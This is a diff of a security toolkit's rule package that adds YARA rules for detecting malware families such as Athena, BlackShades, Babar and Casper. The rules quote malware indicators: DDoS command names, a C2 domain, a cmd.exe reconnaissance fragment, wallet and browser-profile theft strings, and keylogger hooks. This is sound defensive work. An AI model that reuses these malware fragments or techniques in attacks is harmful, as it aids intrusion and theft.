--- remnux-rules-0.0.3/yara/malware/APT_Win_Pipcreat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Win_Pipcreat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule APT_Win_Pipcreat { 
+  meta: 
+    author = "chort (@chort0)"
+    description = "APT backdoor Pipcreat"
+    filetype = "pe,dll" 
+    date = "2013-03"
+    MD5 = "f09d832bea93cf320986b53fce4b8397" // (incorrectly?) identified as Hupigon by many AV on VT 
+    Reference = "http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/"
+    version = "1.0"
+  strings: 
+    $strA = "pip creat failed" wide fullword 
+    $strB = "CraatePipe" ascii fullword 
+    $strC = "are you there? " wide fullword 
+    $strD = "success kill process ok" wide fullword 
+    $strE = "Vista|08|Win7" wide fullword 
+    $rut = "are you there!@#$%^&*()_+" ascii fullword 
+    
+  condition: 
+    $rut or (2 of ($str*)) 
+  }
diff -Nru remnux-rules-0.0.3/yara/malware/Athena.yar remnux-rules-0.0.4/yara/malware/Athena.yar
--- remnux-rules-0.0.3/yara/malware/Athena.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Athena.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,84 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule AthenaHTTP
+{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-08-09"
+        description = "Identify Athena HTTP"
+    strings:
+        $s1 = "%s(%s)"
+        $s2 = "type:on_exec"
+        $s3 = "uid:%s"
+        $s4 = "priv:%s"
+        $s5 = "arch:x%s"
+        $s6 = "gend:%s"
+        $s7 = "cores:%i"
+        $s8 = "ver:%s"
+        $s9 = "net:%s"
+    condition:
+        all of them
+}
+
+
+rule AthenaHTTP_v2 {
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        description = "Athena HTTP identification"
+        source = "https://github.com/arbor/yara/blob/master/athena.yara"
+    strings:
+        $fmt_str1="|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|"
+        $fmt_str2="|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|"
+        $cmd1 = "filesearch.stop"
+        $cmd2 = "rapidget"
+        $cmd3 = "layer4."
+        $cmd4 = "slowloris"
+        $cmd5 = "rudy"
+    condition:
+        all of ($fmt_str*) and 3 of ($cmd*)
+}
+
+rule AthenaIRC {
+    meta:
+        author = "Jason Jones <jasonjones@arbor.net>"
+        description = "Athena IRC v1.8.x, 2.x identification"
+        source = "https://github.com/arbor/yara/blob/master/athena.yara"
+    strings:
+        $cmd1 = "ddos." fullword
+        $cmd2 = "layer4." fullword
+        $cmd3 = "war." fullword
+        $cmd4 = "smartview" fullword
+        $cmd5 = "ftp.upload" fullword
+        $msg1 = "%s %s :%s LAYER4 Combo Flood: Stopped"
+        $msg2 = "%s %s :%s IRC War: Flood started [Type: %s | Target: %s]"
+        $msg3 = "%s %s :%s FTP Upload: Failed"
+        $msg4 = "Athena v2"
+        $msg5 = "%s %s :%s ECF Flood: Stopped [Total Connections: %ld | Rate: %ld Connections/Second]"
+        // v1 strs
+        $amsg1 = "ARME flood on %s/%s:%i for %i seconds [Host confirmed vulnerable"
+        $amsg2 = " Rapid HTTP Combo flood on %s:%i for %i seconds"
+        $amsg3 = "Began flood: %i connections every %i ms to %s:%i"
+        $amsg4 = "IPKiller>Athena"
+        $amsg5 = "Athena=Shit!"
+        $amsg6 = "Athena-v1"
+        $amsg7 = "BTC wallet.dat file found"
+        $amsg8 = "MineCraft lastlogin file found"
+        $amsg9 = "Process '%s' was found and scheduled for deletion upon next reboot"
+        $amsg10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)"
+        // Athena-v1.8.3
+        $amsg11 = "Rapid Connect/Disconnect"
+        $amsg12 = "BTC wallet.dat found,"
+        // v1 cmds
+        $acmd1 = ":!arme"
+        $acmd2 = ":!openurl"
+        $acmd3 = ":!condis"
+        $acmd4 = ":!httpcombo"
+        $acmd5 = ":!urlblock"
+        $acmd6 = ":!udp"
+        $acmd7 = ":!btcwallet"
+    condition:
+        (all of ($cmd*) and 3 of ($msg*)) or (5 of ($amsg*) and 5 of ($acmd*))
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/Babar.yar remnux-rules-0.0.4/yara/malware/Babar.yar
--- remnux-rules-0.0.3/yara/malware/Babar.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Babar.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule SNOWGLOBE_Babar_Malware {
+	meta:
+		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
+		author = "Florian Roth"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		date = "2015/02/18"
+		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+		score = 80
+	strings:
+		$mz = { 4d 5a }
+		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+		$z2 = "ExecQueryFailled!" fullword ascii
+		$z3 = "NBOT_COMMAND_LINE" fullword
+		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+
+		$s1 = "/s /n %s \"%s\"" fullword ascii
+		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s3 = "/c start /wait " fullword ascii
+		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
+		$x2 = "%COMMON_APPDATA%" fullword ascii
+		$x4 = "CONOUT$" fullword ascii
+		$x5 = "cmd.exe" fullword ascii
+		$x6 = "DLLPATH" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 1MB and
+		(
+			( 1 of ($z*) and 1 of ($x*) ) or
+			( 3 of ($s*) and 4 of ($x*) )
+		)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Backdoor_WinntiPharma.yar remnux-rules-0.0.4/yara/malware/Backdoor_WinntiPharma.yar
--- remnux-rules-0.0.3/yara/malware/Backdoor_WinntiPharma.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Backdoor_WinntiPharma.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,18 @@
+rule WinntiPharma
+{
+meta:
+	author = "Jose Ramon Palanco"
+	copyright = "Drainware, Inc."
+	date = "2015-06-23"
+	description = "Backdoor Win64 Winnti Pharma"
+	ref = "https://securelist.com/blog/research/70991/games-are-over/"
+
+strings:
+	$s0 = "Cookie: SN="
+	$s1 = "{3ec05b4a-ea88-1378-3389-66706ba27600}"
+	$s2 = "{4D36E972-E325-11CE-BFC1-08002BE10318}"
+	$s3 = "master secret"
+	$s4 = "MyEngineNetEvent"
+condition:
+	all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/backoff.yar remnux-rules-0.0.4/yara/malware/backoff.yar
--- remnux-rules-0.0.3/yara/malware/backoff.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/backoff.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule backoff {
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-08-21"
+        description = "Identify Backoff"
+	strings:
+    	$s1 = "&op=%d&id=%s&ui=%s&wv=%d&gr=%s&bv=%s"
+        $s2 = "%s @ %s"
+        $s3 = "Upload KeyLogs"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Bangat.yar remnux-rules-0.0.4/yara/malware/Bangat.yar
--- remnux-rules-0.0.3/yara/malware/Bangat.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Bangat.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BangatCode : Bangat Family 
+{
+    meta:
+        description = "Bangat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // dec [ebp + procname], push eax, push edx, call get procaddress
+        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
+    
+    condition:
+        any of them
+}
+
+rule BangatStrings : Bangat Family
+{
+    meta:
+        description = "Bangat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $lib1 = "DreatePipe"
+        $lib2 = "HetSystemDirectoryA"
+        $lib3 = "SeleaseMutex"
+        $lib4 = "DloseWindowStation"
+        $lib5 = "DontrolService"
+        $file = "~hhC2F~.tmp"
+        $mc = "~_MC_3~"
+
+    condition:
+       all of ($lib*) or $file or $mc
+}
+
+rule Bangat : Family
+{
+    meta:
+        description = "Bangat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        BangatCode or BangatStrings
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/BlackRev.yar remnux-rules-0.0.4/yara/malware/BlackRev.yar
--- remnux-rules-0.0.3/yara/malware/BlackRev.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/BlackRev.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+
+*/
+
+rule BlackRev
+{
+   meta:
+      author = "Dennis Schwarz"
+      date = "2013-05-21"
+      description = "Black Revolution DDoS Malware. http://www.arbornetworks.com/asert/2013/05/the-revolution-will-be-written-in-delphi/"
+      origin = "https://github.com/arbor/yara/blob/master/blackrev.yara"
+
+   strings: 
+      $base1 = "http"
+      $base2 = "simple"
+      $base3 = "loginpost"
+      $base4 = "datapost"
+
+      $opt1 = "blackrev"
+      $opt2 = "stop"
+      $opt3 = "die"
+      $opt4 = "sleep"
+      $opt5 = "syn"
+      $opt6 = "udp"
+      $opt7 = "udpdata"
+      $opt8 = "icmp"
+      $opt9 = "antiddos"
+      $opt10 = "range"
+      $opt11 = "fastddos"
+      $opt12 = "slowhttp"
+      $opt13 = "allhttp"
+      $opt14 = "tcpdata"
+      $opt15 = "dataget"
+
+   condition:
+      all of ($base*) and 5 of ($opt*)
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/BlackShades.yar remnux-rules-0.0.4/yara/malware/BlackShades.yar
--- remnux-rules-0.0.3/yara/malware/BlackShades.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/BlackShades.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,134 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BlackShades_3 : Trojan
+{
+    meta:
+        description = "BlackShades RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $mod1 = /(m)odAPI/
+        $mod2 = /(m)odAudio/
+        $mod3 = /(m)odBtKiller/
+        $mod4 = /(m)odCrypt/
+        $mod5 = /(m)odFuctions/
+        $mod6 = /(m)odHijack/
+        $mod7 = /(m)odICallBack/
+        $mod8 = /(m)odIInet/
+        $mod9 = /(m)odInfect/
+        $mod10 = /(m)odInjPE/
+        $mod11 = /(m)odLaunchWeb/
+        $mod12 = /(m)odOS/
+        $mod13 = /(m)odPWs/
+        $mod14 = /(m)odRegistry/
+        $mod15 = /(m)odScreencap/
+        $mod16 = /(m)odSniff/
+        $mod17 = /(m)odSocketMaster/
+        $mod18 = /(m)odSpread/
+        $mod19 = /(m)odSqueezer/
+        $mod20 = /(m)odSS/
+        $mod21 = /(m)odTorrentSeed/
+
+        $tmr1 = /(t)mrAlarms/
+        $tmr2 = /(t)mrAlive/
+        $tmr3 = /(t)mrAnslut/
+        $tmr4 = /(t)mrAudio/
+        $tmr5 = /(t)mrBlink/
+        $tmr6 = /(t)mrCheck/
+        $tmr7 = /(t)mrCountdown/
+        $tmr8 = /(t)mrCrazy/
+        $tmr9 = /(t)mrDOS/
+        $tmr10 = /(t)mrDoWork/
+        $tmr11 = /(t)mrFocus/
+        $tmr12 = /(t)mrGrabber/
+        $tmr13 = /(t)mrInaktivitet/
+        $tmr14 = /(t)mrInfoTO/
+        $tmr15 = /(t)mrIntervalUpdate/
+        $tmr16 = /(t)mrLiveLogger/
+        $tmr17 = /(t)mrPersistant/
+        $tmr18 = /(t)mrScreenshot/
+        $tmr19 = /(t)mrSpara/
+        $tmr20 = /(t)mrSprid/
+        $tmr21 = /(t)mrTCP/
+        $tmr22 = /(t)mrUDP/
+        $tmr23 = /(t)mrWebHide/
+
+    condition:    
+        10 of ($mod*) or 10 of ($tmr*)
+}
+
+rule BlackShades2 : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
+rule BlackShades_4 : rat
+{
+	meta:
+		description = "BlackShades"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-01-12"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
+		$b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
+		$c = { 62 73 73 5F 73 65 72 76 65 72 }
+		$d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
+		$e = { 6D 6F 64 49 6E 6A 50 45 }
+		$apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
+
+	condition:
+		any of ($a, $b, $c, $d, $e) or $apikey		
+}
+
+
+rule BlackShades : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="26/06/2013"
+		description="BlackShades Server"
+		
+	strings:
+		$signature1={62 73 73 5F 73 65 72 76 65 72}
+		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
+		$signature3={6D 6F 64 49 6E 6A 50 45}
+		
+	condition:
+		$signature1 and $signature2 and $signature3
+}
+
+rule BlackShades_25052015
+{
+    meta:
+        author = "Brian Wallace (@botnet_hunter)"
+        date = "2014/04"
+        ref = "http://malwareconfig.com/stats/PoisonIvy"
+        ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
+        family = "blackshades"
+
+    strings:
+        $string1 = "bss_server"
+        $string2 = "txtChat"
+        $string3 = "UDPFlood"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/BlackWorm.yar remnux-rules-0.0.4/yara/malware/BlackWorm.yar
--- remnux-rules-0.0.3/yara/malware/BlackWorm.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/BlackWorm.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule BlackWorm{
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2015-05-20"
+        description = "Identify BlackWorm"
+    strings:
+        $str1 = "m_ComputerObjectProvider"
+        $str2 = "MyWebServices"
+        $str3 = "get_ExecutablePath"
+        $str4 = "get_WebServices"
+        $str5 = "My.WebServices"
+        $str6 = "My.User"
+        $str7 = "m_UserObjectProvider"
+        $str8 = "DelegateCallback"
+        $str9 = "TargetMethod"
+        $str10 = "000004b0" wide
+        $str11 = "Microsoft Corporation" wide
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Bolonyokte.yar remnux-rules-0.0.4/yara/malware/Bolonyokte.yar
--- remnux-rules-0.0.3/yara/malware/Bolonyokte.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Bolonyokte.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bolonyokte : rat 
+{
+	meta:
+		description = "UnknownDotNet RAT - Bolonyokte"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+
+	strings:
+		$campaign1 = "Bolonyokte" ascii wide
+		$campaign2 = "donadoni" ascii wide
+		
+		$decoy1 = "nyse.com" ascii wide
+		$decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
+		$decoy3 = "bf13-5d45cb40" ascii wide
+		
+		$artifact1 = "Backup.zip"  ascii wide
+		$artifact2 = "updates.txt" ascii wide
+		$artifact3 = "vdirs.dat" ascii wide
+		$artifact4 = "default.dat"
+		$artifact5 = "index.html"
+		$artifact6 = "mime.dat"
+		
+		$func1 = "FtpUrl"
+		$func2 = "ScreenCapture"
+		$func3 = "CaptureMouse"
+		$func4 = "UploadFile"
+
+		$ebanking1 = "Internet Banking" wide
+		$ebanking2 = "(Online Banking)|(Online banking)"
+		$ebanking3 = "(e-banking)|(e-Banking)" nocase
+		$ebanking4 = "login"
+		$ebanking5 = "en ligne" wide
+		$ebanking6 = "bancaires" wide
+		$ebanking7 = "(eBanking)|(Ebanking)" wide
+		$ebanking8 = "Anmeldung" wide
+		$ebanking9 = "internet banking" nocase wide
+		$ebanking10 = "Banking Online" nocase wide
+		$ebanking11 = "Web Banking" wide
+		$ebanking12 = "Power"
+
+	condition:
+		any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Boouset.yar remnux-rules-0.0.4/yara/malware/Boouset.yar
--- remnux-rules-0.0.3/yara/malware/Boouset.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Boouset.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule BoousetCode : Boouset Family 
+{
+    meta:
+        description = "Boouset code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
+        
+    condition:
+        any of them
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Bozok.yar remnux-rules-0.0.4/yara/malware/Bozok.yar
--- remnux-rules-0.0.3/yara/malware/Bozok.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Bozok.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule Bozok
+{
+	meta:
+		author = " Kevin Breen <kevin@techanarchy.net>"
+		date = "2014/04"
+		ref = "http://malwareconfig.com/stats/Bozok"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
+
+	strings:
+		$a = "getVer" nocase
+		$b = "StartVNC" nocase
+		$c = "SendCamList" nocase
+		$d = "untPlugin" nocase
+		$e = "gethostbyname" nocase
+
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Bublik_downloader.yar remnux-rules-0.0.4/yara/malware/Bublik_downloader.yar
--- remnux-rules-0.0.3/yara/malware/Bublik_downloader.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Bublik_downloader.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Bublik : Downloader
+{
+	meta:
+		author="Kevin Falcoz"
+		date="29/09/2013"
+		description="Bublik Trojan Downloader"
+		
+	strings:
+		$signature1={63 6F 6E 73 6F 6C 61 73}
+		$signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69}
+		
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/CAP_HookExKeylogger.yar remnux-rules-0.0.4/yara/malware/CAP_HookExKeylogger.yar
--- remnux-rules-0.0.3/yara/malware/CAP_HookExKeylogger.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/CAP_HookExKeylogger.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,18 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule CAP_HookExKeylogger
+{
+meta:
+    author = "Brian C. Bell -- @biebsmalwareguy"
+    reference = "https://github.com/DFIRnotes/rules/blob/master/CAP_HookExKeylogger.yar"
+
+	strings:
+	$str_Win32hookapi = "SetWindowsHookEx" nocase
+	$str_Win32llkey = "WH_KEYBOARD_LL" nocase
+	$str_Win32key = "WH_KEYBOARD" nocase
+
+	condition:
+    2 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/CAP_Win32Inet.yara remnux-rules-0.0.4/yara/malware/CAP_Win32Inet.yara
--- remnux-rules-0.0.3/yara/malware/CAP_Win32Inet.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/CAP_Win32Inet.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,63 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/* 
+  github.com/dfirnotes/rules
+  Version 0.0.0
+*/
+
+rule Str_Win32_Winsock2_Library
+{
+    meta:
+        author = "@adricnet"
+        description = "Match Winsock 2 API library declaration"
+        method = "String match"
+    strings:
+        $ws2_lib = "Ws2_32.dll" nocase
+        $wsock2_lib = "WSock32.dll" nocase
+    condition:
+	(any of ($ws2_lib, $wsock2_lib))
+}
+
+rule Str_Win32_Wininet_Library
+{
+    meta:
+        author = "@adricnet"
+        description = "Match Windows Inet API library declaration"
+        method = "String match"
+    strings:
+        $wininet_lib = "WININET.dll" nocase
+    condition:
+	(all of ($wininet*))
+}
+
+rule Str_Win32_Internet_API
+{
+    meta:
+        author = "@adricnet"
+        description = "Match Windows Inet API call"
+        method = "String match, trim the As"
+    strings:
+	$wininet_call_closeh = "InternetCloseHandle"
+	$wininet_call_readf = "InternetReadFile"
+	$wininet_call_connect = "InternetConnect"
+	$wininet_call_open = "InternetOpen"
+
+    condition:
+	(any of ($wininet_call*))
+}
+
+rule Str_Win32_Http_API
+{
+    meta:
+        author = "@adricnet"
+        description = "Match Windows Http API call"
+        method = "String match, trim the As"
+    strings:
+	$wininet_call_httpr = "HttpSendRequest"
+	$wininet_call_httpq = "HttpQueryInfo"
+	$wininet_call_httpo = "HttpOpenRequest"
+    condition:
+	(any of ($wininet_call_http*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Casper.yar remnux-rules-0.0.4/yara/malware/Casper.yar
--- remnux-rules-0.0.3/yara/malware/Casper.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Casper.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,101 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Casper_Backdoor_x86 {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+		score = 80
+	strings:
+		$s1 = "\"svchost.exe\"" fullword wide
+		$s2 = "firefox.exe" fullword ascii
+		$s3 = "\"Host Process for Windows Services\"" fullword wide
+		
+		$x1 = "\\Users\\*" fullword ascii
+		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
+		$x4 = "\\Documents and Settings\\*" fullword ascii
+		
+		$y1 = "%s; %S=%S" fullword wide
+		$y2 = "%s; %s=%s" fullword ascii
+		$y3 = "Cookie: %s=%s" fullword ascii
+		$y4 = "http://%S:%d" fullword wide
+		
+		$z1 = "http://google.com/" fullword ascii
+		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+		$z3 = "Operating System\"" fullword wide
+	condition:
+		( all of ($s*) ) or
+		( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
+}
+
+rule Casper_EXE_Dropper {
+	meta:
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/05"
+		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+		score = 80
+	strings:
+		$s0 = "<Command>" fullword ascii
+		$s1 = "</Command>" fullword ascii
+		$s2 = "\" /d \"" fullword ascii
+		$s4 = "'%s' %s" fullword ascii
+		$s5 = "nKERNEL32.DLL" fullword wide
+		$s6 = "@ReturnValue" fullword wide
+		$s7 = "ID: 0x%x" fullword ascii
+		$s8 = "Name: %S" fullword ascii
+	condition:
+		7 of them
+}
+
+rule Casper_Included_Strings {
+	meta:
+		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 50
+	strings:
+		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+		$a1 = "& SYSTEMINFO) ELSE EXIT"
+		
+		$mz = { 4d 5a }
+		$c1 = "domcommon.exe" wide fullword							// File Name
+		$c2 = "jpic.gov.sy" fullword 								// C2 Server
+		$c3 = "aiomgr.exe" wide fullword							// File Name
+		$c4 = "perfaudio.dat" fullword								// Temp File Name
+		$c5 = "Casper_DLL.dll" fullword								// Name 
+		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } 	// Decryption Key
+		$c7 = "{4216567A-4512-9825-7745F856}" fullword 				// Mutex
+	condition:
+		all of ($a*) or
+		( $mz at 0 ) and ( 1 of ($c*) )
+}
+
+rule Casper_SystemInformation_Output {
+	meta:
+		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		author = "Florian Roth"
+		reference = "http://goo.gl/VRJNLo"
+		date = "2015/03/06"
+		score = 70	
+	strings:
+		$a0 = "***** SYSTEM INFORMATION ******"
+		$a1 = "***** SECURITY INFORMATION ******"
+		$a2 = "Antivirus: "
+		$a3 = "Firewall: "
+		$a4 = "***** EXECUTION CONTEXT ******"
+		$a5 = "Identity: "
+		$a6 = "<CONFIG TIMESTAMP="
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Cerberus.yar remnux-rules-0.0.4/yara/malware/Cerberus.yar
--- remnux-rules-0.0.3/yara/malware/Cerberus.yar	1970-01-01 00:00:00.000000000 +0000
